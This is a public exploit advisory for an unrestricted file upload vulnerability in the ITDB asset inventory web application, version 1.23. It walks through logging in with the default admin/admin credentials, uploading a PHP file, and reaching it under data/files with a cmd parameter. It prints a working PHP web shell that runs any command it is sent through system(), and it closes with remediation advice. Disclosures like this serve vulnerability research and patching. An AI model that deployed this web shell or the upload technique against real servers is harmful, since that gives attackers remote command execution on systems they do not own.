#

Exploit Title: Unrestricted File Upload Vulnerability on ITDB (IT ITems DataBase) Application
# Date: Sept 07th, 2017
# Exploit Author: @rungga_reksya
# Vendor Homepage: http://www.sivann.gr/software/itdb/
# Software Link: https://github.com/sivann/itdb/archive/master.zip
# Version: 1.23
# Tested on: Windows Server 2008 R2
# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)


I. Application Background:
ITDB is a web based asset inventory management tool used to store information about assets found in office
environments, with a focus -but not lmited to- IT assets. It is not or targets for ITIL/CMDB compliance (yet), but
it has served me for years and hopefully it will do the same for you :-)
ITDB comes with sources and is distributed under the GNU Public license.

II. Vulnerability Description:
Unrestricted file upload vulnerability in “Add File” menu at ITDB version 1.23 allows authenticated with type
account is “Full Access or Read” to upload malicious code (shell) with extension is “php”.

III. Exploit:
If we refer to file “00-INSTALL.txt” which is username and password default “admin/admin”. Example Attacker
got admin privilege and login as admin into ITDB application. Then Attacker access to “Add File” menu and
Upload a File your shell (shellcmd.php), and then click Save —> Bingo Success

Directory Listing at “http://target.com/itdb-directory/data/files/“

Check your shell on field “Filename” and access your shell like this:
http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami

script for shellcmd.php
======
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
======


IV. Remediation:
Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use
a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without
a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on
the upload folder so the files within it are not executable. If possible, rename the files that are uploaded. (source:
https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)

Content-type Verification: This kind of verification completely depends upon content-type header, e.g. Content-
Type: image/jpeg, containing the MIME type. This is a very weak validation mechanism, as this header is supplied
by the user or attacker. (source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-
vulnerability)


V. Proof of Concept:

Admin Privilege (Full Access)

Low User (Read Only)